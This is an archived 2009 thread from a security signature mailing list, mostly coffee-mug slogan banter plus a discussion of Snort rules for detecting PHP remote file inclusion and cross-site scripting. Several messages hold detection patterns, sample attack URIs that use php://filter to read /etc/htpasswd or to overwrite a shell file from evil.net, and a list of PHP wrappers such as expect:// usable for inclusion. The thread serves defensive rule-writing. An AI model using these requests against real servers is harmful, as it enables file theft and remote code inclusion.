think it's the >> best way to get a good decision made here. >> >> Keep sending the ideas for a couple more days then I'll put the poll up >> and let everyone know. >> >> Thanks for the ideas! These are all great. Especially the sourcefire >> ones. :) >> >> Matt >> >> Haag, Dale A wrote: >>> Here are my entries: >>> >>> 1. Coffee and Packets; Best if filtered >>> >>> 2. Professional >>> Coffee >>> Research >>> Engineer >>> ( bold font on PCRE ) >>> >>> 3. 1 spoon sugar, 2 spoons >>> [ INSERT ET LOGO HERE ] >>> >>> 4. Start Your Day Right >>> [ INSERT ET LOGO HERE ] >>> >>> >>> ----------------------------------------- >>> The information contained in this e-mail and any attached documents >>> may contain information that is confidential or otherwise protected >>> from disclosure. If you are not the intended recipient of this >>> message, or if this message has been sent to you in error, please >>> immediately alert the sender by reply e-mail and then delete this >>> message, including any attachments. Any dissemination, distribution >>> or other use of the contents of this message by anyone other than >>> the intended recipient is strictly prohibited. >>> _______________________________________________ >>> Emerging-sigs mailing list >>> Emerging-sigs at emergingthreats.net >>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> -- >> -------------------------------------------- >> Matthew Jonkman >> Emerging Threats >> Open Information Security Foundation (OISF) >> Phone 765-429-0398 >> Fax 312-264-0205 >> http://www.emergingthreats.net >> http://www.openinformationsecurityfoundation.org >> -------------------------------------------- >> >> PGP: http://www.jonkmans.com/mattjonkman.asc >> >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > Bill Scherr IV, GSEC, GCIA > Principal Security Engineer > EWA Information and Infrastructure Technologies > bscherr at iit-tek.com > bscherr at ewa.com > 703-478-7608 > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Aug 6 14:37:57 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:37:57 -0400 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt In-Reply-To: <1249510693.4378.47.camel@localhost> References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost> Message-ID: <4A7B2305.4000605@jonkmans.com> Adding profile to 2002997. I'm scared of the .php and an ftp/http in it because there are many legitimate places that happens. I see a ton of ad servers that put the referrer in the uri, etc. I think we'd be killing ourselves here. matt Frank Knobbe wrote: > On Wed, 2009-08-05 at 22:56 +0200, mareadmin wrote: >> since i wanted to track every single rfi-connection-attempt >> and monster-list doesnt covers everything >> i build up some "generic" php-rfi-sic; i tested it, since yesterday >> no fp, it even gets stuff like >> GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt? >> >> it a modified sid:2002997 >> >> >> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;) > > > What is the purpose of adding "php" to the URI check? Have you see > requests like "vuln.asp?inclue=php://evil.com/test.txt" ? > > 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in > the URL. I can't see =php:// being a valid URI. > > > I agree that the old 2002997 needs to be updated (for example, add > "profile" to the list of matches), but just matching on ".php" with any > "=http" in the packet will cause a ton of falses. > > How big are the networks you tested this on? > > Regards, > Frank > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Aug 6 14:49:14 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:49:14 -0400 Subject: [Emerging-Sigs] various sigs In-Reply-To: References: Message-ID: <4A7B25AA.7080603@jonkmans.com> I posted the first and third. The rest would have to be pretty specific to a local net. Making sure they don't have those things actually happening intentionally... Thanks Kevin! Matt Kevin Ross wrote: > Thoughts? I have disabled the ones which in some enviroments may cause > high load/false positives but they work. > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > in URI, Possible Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:""; nocase; > classtype:web-application-attack; reference:url,ha.ckers.org/xss.html > ; sid:16000001; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= > in URI, Possible Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"SRC="; nocase; > classtype:web-application-attack; reference:url,ha.ckers.org/xss.html > ; sid:16000002; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Onmouseover= in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onmouseover="; nocase; > classtype:web-application-attack; > reference:url,www.w3schools.com/jsref/jsref_onmouseover.asp > ; sid:16000003; > rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Possible Remote File Inclusion Attempt Using path_escape"; > flow:to_server,established; uricontent:".php?path_escape=http"; nocase; > classtype:web-application-attack; sid:16000004; rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Two > .php Extensions Together in URI, Possible Remote File Inclusion > Attempt"; flow:to_server,established; uricontent:".php.php"; nocase; > classtype:web-application-attack; > reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion > ; sid:16000005; rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Possible Remote File Inclusion Attempt Using php?page="; > flow:to_server,established; uricontent:".php?page=http"; nocase; > classtype:web-application-attack; > reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion > ; > reference:url,projects.webappsec.org/Remote-File-Inclusion > ; sid:16000006; rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Possible Remote File Inclusion Attempt Using php?file="; > flow:to_server,established; uricontent:".php?file=http"; nocase; > classtype:web-application-attack; > reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion > ; > reference:url,projects.webappsec.org/Remote-File-Inclusion > ; sid:16000007; rev:1;) > > Kevin > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From inittab at jtan.com Thu Aug 6 14:53:22 2009 From: inittab at jtan.com (RPG) Date: Thu, 06 Aug 2009 14:53:22 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B21ED.5030606@jonkmans.com> References: , , <4A7B1BCA.1030906@jonkmans.com> <4A7B21ED.5030606@jonkmans.com> Message-ID: <4A7B26A2.7040700@jtan.com> [Logo] defending networks against all enemies foreign and domestic Matt Jonkman wrote: > Amen! :) > > Matt > > Bill Scherr IV wrote: > >> Here's One >> >> There are only three things you can trust: >> Coffee >> Packets >> [Logo] >> >> >> (Or did someone already post that?) >> B. >> >> Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman , was sent to me: >> >> Date sent: Thu, 06 Aug 2009 14:07:06 -0400 >> From: Matt Jonkman >> To: "Haag, Dale A" >> Copies to: emerging-sigs at emergingthreats.net >> Subject: Re: [Emerging-Sigs] Coffee Cup Slogans >> >> >>> There are so many good ideas I'm getting the better ones together and >>> we'll do a vote. I know the poll thing is hokey, but I think it's the >>> best way to get a good decision made here. >>> >>> Keep sending the ideas for a couple more days then I'll put the poll up >>> and let everyone know. >>> >>> Thanks for the ideas! These are all great. Especially the sourcefire >>> ones. :) >>> >>> Matt >>> >>> Haag, Dale A wrote: >>> >>>> Here are my entries: >>>> >>>> 1. Coffee and Packets; Best if filtered >>>> >>>> 2. Professional >>>> Coffee >>>> Research >>>> Engineer >>>> ( bold font on PCRE ) >>>> >>>> 3. 1 spoon sugar, 2 spoons >>>> [ INSERT ET LOGO HERE ] >>>> >>>> 4. Start Your Day Right >>>> [ INSERT ET LOGO HERE ] >>>> >>>> >>>> ----------------------------------------- >>>> The information contained in this e-mail and any attached documents >>>> may contain information that is confidential or otherwise protected >>>> from disclosure. If you are not the intended recipient of this >>>> message, or if this message has been sent to you in error, please >>>> immediately alert the sender by reply e-mail and then delete this >>>> message, including any attachments. Any dissemination, distribution >>>> or other use of the contents of this message by anyone other than >>>> the intended recipient is strictly prohibited. >>>> _______________________________________________ >>>> Emerging-sigs mailing list >>>> Emerging-sigs at emergingthreats.net >>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>>> >>> -- >>> -------------------------------------------- >>> Matthew Jonkman >>> Emerging Threats >>> Open Information Security Foundation (OISF) >>> Phone 765-429-0398 >>> Fax 312-264-0205 >>> http://www.emergingthreats.net >>> http://www.openinformationsecurityfoundation.org >>> -------------------------------------------- >>> >>> PGP: http://www.jonkmans.com/mattjonkman.asc >>> >>> >>> _______________________________________________ >>> Emerging-sigs mailing list >>> Emerging-sigs at emergingthreats.net >>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>> >> Bill Scherr IV, GSEC, GCIA >> Principal Security Engineer >> EWA Information and Infrastructure Technologies >> bscherr at iit-tek.com >> bscherr at ewa.com >> 703-478-7608 >> >> > > From jonkman at jonkmans.com Thu Aug 6 15:03:31 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 15:03:31 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B26A2.7040700@jtan.com> References: , , <4A7B1BCA.1030906@jonkmans.com> <4A7B21ED.5030606@jonkmans.com> <4A7B26A2.7040700@jtan.com> Message-ID: <4A7B2903.5060503@jonkmans.com> Nice! I have the urge to stand at attention and salute for some reason... RPG wrote: > [Logo] > defending networks > against all enemies > foreign and domestic > > > > Matt Jonkman wrote: >> Amen! :) >> >> Matt >> >> Bill Scherr IV wrote: >> >>> Here's One >>> >>> There are only three things you can trust: >>> Coffee >>> Packets >>> [Logo] >>> >>> >>> (Or did someone already post that?) >>> B. >>> >>> Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman >>> , was sent to me: >>> >>> Date sent: Thu, 06 Aug 2009 14:07:06 -0400 >>> From: Matt Jonkman >>> To: "Haag, Dale A" >>> Copies to: emerging-sigs at emergingthreats.net >>> Subject: Re: [Emerging-Sigs] Coffee Cup Slogans >>> >>> >>>> There are so many good ideas I'm getting the better ones together and >>>> we'll do a vote. I know the poll thing is hokey, but I think it's the >>>> best way to get a good decision made here. >>>> >>>> Keep sending the ideas for a couple more days then I'll put the poll up >>>> and let everyone know. >>>> >>>> Thanks for the ideas! These are all great. Especially the sourcefire >>>> ones. :) >>>> >>>> Matt >>>> >>>> Haag, Dale A wrote: >>>> >>>>> Here are my entries: >>>>> >>>>> 1. Coffee and Packets; Best if filtered >>>>> >>>>> 2. Professional >>>>> Coffee >>>>> Research >>>>> Engineer >>>>> ( bold font on PCRE ) >>>>> >>>>> 3. 1 spoon sugar, 2 spoons >>>>> [ INSERT ET LOGO HERE ] >>>>> >>>>> 4. Start Your Day Right >>>>> [ INSERT ET LOGO HERE ] >>>>> >>>>> >>>>> ----------------------------------------- >>>>> The information contained in this e-mail and any attached documents >>>>> may contain information that is confidential or otherwise protected >>>>> from disclosure. If you are not the intended recipient of this >>>>> message, or if this message has been sent to you in error, please >>>>> immediately alert the sender by reply e-mail and then delete this >>>>> message, including any attachments. Any dissemination, distribution >>>>> or other use of the contents of this message by anyone other than >>>>> the intended recipient is strictly prohibited. >>>>> _______________________________________________ >>>>> Emerging-sigs mailing list >>>>> Emerging-sigs at emergingthreats.net >>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>>>> >>>> -- >>>> -------------------------------------------- >>>> Matthew Jonkman >>>> Emerging Threats >>>> Open Information Security Foundation (OISF) >>>> Phone 765-429-0398 >>>> Fax 312-264-0205 >>>> http://www.emergingthreats.net >>>> http://www.openinformationsecurityfoundation.org >>>> -------------------------------------------- >>>> >>>> PGP: http://www.jonkmans.com/mattjonkman.asc >>>> >>>> >>>> _______________________________________________ >>>> Emerging-sigs mailing list >>>> Emerging-sigs at emergingthreats.net >>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>>> >>> Bill Scherr IV, GSEC, GCIA >>> Principal Security Engineer >>> EWA Information and Infrastructure Technologies >>> bscherr at iit-tek.com >>> bscherr at ewa.com >>> 703-478-7608 >>> >>> >> >> > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From evilghost at packetmail.net Thu Aug 6 15:12:51 2009 From: evilghost at packetmail.net (evilghost@packetmail.net) Date: Thu, 6 Aug 2009 14:12:51 -0500 Subject: [Emerging-Sigs] Snort Validator In-Reply-To: <4A7B04C6.5010601@jonkmans.com> References: <4A7B04C6.5010601@jonkmans.com> Message-ID: <4A7B2B33.4040902@packetmail.net> [ET LOGO] We make our own coffee Matt Jonkman wrote: > Decoder's Snort Validator is being used here to keep your rules clean > and fresh. It's a great script, we've had it in palce since about the > last time we had a ruleset error get published. (few months now) :) > > We've got a wiki page up for it and decoder has generously decided to > publish. This script will be very useful for everyone that has any local > rulesets. Highly recommend using it. > > You can find information and downloads here: > http://doc.emergingthreats.net/bin/view/Main/SnortValidator > > Thanks again decoder! > > Matt > > From daniel.clemens at packetninjas.net Thu Aug 6 15:48:07 2009 From: daniel.clemens at packetninjas.net (Daniel Clemens) Date: Thu, 6 Aug 2009 14:48:07 -0500 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B2903.5060503@jonkmans.com> References: , , <4A7B1BCA.1030906@jonkmans.com> <4A7B21ED.5030606@jonkmans.com> <4A7B26A2.7040700@jtan.com> <4A7B2903.5060503@jonkmans.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Aug 6, 2009, at 2:03 PM, Matt Jonkman wrote: > Nice! I have the urge to stand at attention and salute for some > reason... BTW, Packetninjas LLC will contribute one pound of freshly roasted coffee to the winner of this months winner. We roast our own beans over here and for the next month it looks like we will be enjoying the great and ever fresh 'Kona' coffee beans. Of course this is if people would want this thrown in... :P | Daniel Uriah Clemens | Packetninjas L.L.C | | http://www.packetninjas.net | c. 205.567.6850 | | o. 866.267.8851 - - Esse quam videra (to be , rather than to appear) -----BEGIN PGP SIGNATURE----- iD8DBQFKezN3lZy1vkUrR4MRAkX+AJ0UG9eA2xjVhhpKuuA7YYlcBjRHJQCfT6Q0 /2utU+8LJjCjWjdYrjeTwig= =bNB/ -----END PGP SIGNATURE----- From emerging at emergingthreats.net Thu Aug 6 16:00:11 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 6 Aug 2009 16:00:11 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090806200011.EDA054504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Aug 6 16:00:11 2009 [***] [+++] Added rules: [+++] 2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules) 2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules) 2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules) [///] Modified active rules: [///] 2002997 - ET WEB PHP Remote File Inclusion (monster list http) (emerging-web.rules) 2009670 - ET WEB Nagios statuswml.cgi Remote Arbitrary Shell Command Injection attempt (emerging-web.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-malware.rules (1): # ref: a9036ae5d9bb8e3c53d5e0126d448d1d -> Added to emerging-sid-msg.map (3): 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 -> Added to emerging-sid-msg.map.txt (3): 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 -> Added to emerging-virus.rules (1): # ref: 14d98e50d25dfc3c1bc011c2856ac1a8 [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (20): 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (20): 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From Dale_A_Haag at homedepot.com Thu Aug 6 16:15:16 2009 From: Dale_A_Haag at homedepot.com (Haag, Dale A) Date: Thu, 6 Aug 2009 16:15:16 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: Message-ID: ET Phone Home [ ET LOGO ] Coffee Tea or ET [ ET LOGO ] SNORT'em If You Got 'Em! [ ET LOGO ] ----------------------------------------- The information contained in this e-mail and any attached documents may contain information that is confidential or otherwise protected from disclosure. If you are not the intended recipient of this message, or if this message has been sent to you in error, please immediately alert the sender by reply e-mail and then delete this message, including any attachments. Any dissemination, distribution or other use of the contents of this message by anyone other than the intended recipient is strictly prohibited. From diomar at rmws.net Thu Aug 6 16:26:05 2009 From: diomar at rmws.net (J Carvalho) Date: Thu, 6 Aug 2009 16:26:05 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: Message-ID: Evangelized Technology [appropriate logo] Engineered Taxonomy [appropriate logo] It's been a long day and I haven't had enough |C0 FF EE| (still my favorite). --joe From frank at knobbe.us Thu Aug 6 16:39:06 2009 From: frank at knobbe.us (Frank Knobbe) Date: Thu, 6 Aug 2009 15:39:06 -0500 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt In-Reply-To: <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com> References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost> <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com> Message-ID: <20090806203906.GC87196@knobbe.us> On Thu, Aug 06, 2009 at 06:57:58AM +0100, Jamie Riden wrote: > > 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in > > the URL. I can't see =php:// being a valid URI. > > I love the smell of optimism in the mornings :) > > See http://us.php.net/manual/en/wrappers.php, particularly > http://us.php.net/manual/en/wrappers.php.php > > "php://input" can be the raw POST data for example. > > also, an example given for php://filter: > > readfile("php://filter/resource=http://www.example.com"); Well, that's just wrong :) So what would be a good example that uses "=php://" in the request? "/something.php?php://filter/write/resource=~/.shrc=http://evil.net" "/something.php?php://filter/read/read=/etc/htpasswd" I guess any *remote* inclusions are still caught thanks to the "=http" match. Since it sounds like you have some experience with php://, are there ways to read/write files on the file system that way? Cheers, Frank From jim.mcquaid at gmail.com Thu Aug 6 17:29:26 2009 From: jim.mcquaid at gmail.com (James McQuaid) Date: Thu, 6 Aug 2009 17:29:26 -0400 Subject: [Emerging-Sigs] coffee cup slogans Message-ID: Thus far, I've enjoyed these the most: Serious mug (in upper case with all three lines no taller than height of logo): [Logo] DEFENDING NETWORKS AGAINST ALL ENEMIES FOREIGN AND DOMESTIC Humorous mug: [Logo] content: "|C0 FF EE| -- James McQuaid http://www.jamesmcquaid.com From inittab at jtan.com Fri Aug 7 10:45:58 2009 From: inittab at jtan.com (RPG) Date: Fri, 07 Aug 2009 10:45:58 -0400 Subject: [Emerging-Sigs] coffee cup slogans In-Reply-To: References: Message-ID: <4A7C3E26.4080603@jtan.com> I agree :) Send me six of each please :) James McQuaid wrote: > Thus far, I've enjoyed these the most: > > Serious mug (in upper case with all three lines no taller than height of logo): > [Logo] > DEFENDING NETWORKS > AGAINST ALL ENEMIES > FOREIGN AND DOMESTIC > > > Humorous mug: > [Logo] > content: "|C0 FF EE| > > > From jamie.riden at gmail.com Fri Aug 7 11:02:03 2009 From: jamie.riden at gmail.com (Jamie Riden) Date: Fri, 7 Aug 2009 16:02:03 +0100 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt In-Reply-To: <20090806203906.GC87196@knobbe.us> References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost> <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com> <20090806203906.GC87196@knobbe.us> Message-ID: <17b0fcab0908070802m4595faf5m454f63f956840e16@mail.gmail.com> 2009/8/6 Frank Knobbe : > On Thu, Aug 06, 2009 at 06:57:58AM +0100, Jamie Riden wrote: >> > 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in >> > the URL. I can't see =php:// being a valid URI. >> >> I love the smell of optimism in the mornings :) >> >> See http://us.php.net/manual/en/wrappers.php, particularly >> http://us.php.net/manual/en/wrappers.php.php >> >> "php://input" can be the raw POST data for example. >> >> also, an example given for php://filter: >> >> readfile("php://filter/resource=http://www.example.com"); > > > Well, that's just wrong :) Agreed! But it gets better. echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo='); also compress: $file = 'compress.zlib://http://www.example.com/myarchive.gz'; $fr = fopen($file, 'rb'); file:// as default: include("\\smbserver\share\path\to\winfile.ext"); and if you've enabled ssh or expect: ssh2.exec://user:pass at example.com:22/usr/local/bin/somecmd expect://command > So what would be a good example that uses "=php://" in the request? > > "/something.php?php://filter/write/resource=~/.shrc=http://evil.net" > "/something.php?php://filter/read/read=/etc/htpasswd" > > I guess any *remote* inclusions are still caught thanks to the "=http" > match. > > Since it sounds like you have some experience with php://, are there ways > to read/write files on the file system that way? I haven't played with any of these, but looks like a potentially large can of worms just going from the doco. cheers, Jamie -- Jamie Riden / jamesr at europe.com / jamie at honeynet.org.uk http://www.ukhoneynet.org/members/jamie/ From jonkman at jonkmans.com Fri Aug 7 11:30:18 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 07 Aug 2009 11:30:18 -0400 Subject: [Emerging-Sigs] coffee cup slogans VOTING OPEN In-Reply-To: <4A7C3E26.4080603@jtan.com> References: <4A7C3E26.4080603@jtan.com> Message-ID: <4A7C488A.4050203@jonkmans.com> I'm with you there, those two are great. If both get enough votes and the pricing is reasonable to print them we could even go with both versions. Anyway, we've filled up the options for the poll size, so lets start voting. If any new ideas come up we can run them in a second poll with the top of this one later. http://www.emergingthreats.net/ Poll will be on your right side of the page. Matt RPG wrote: > I agree :) Send me six of each please :) > > James McQuaid wrote: >> Thus far, I've enjoyed these the 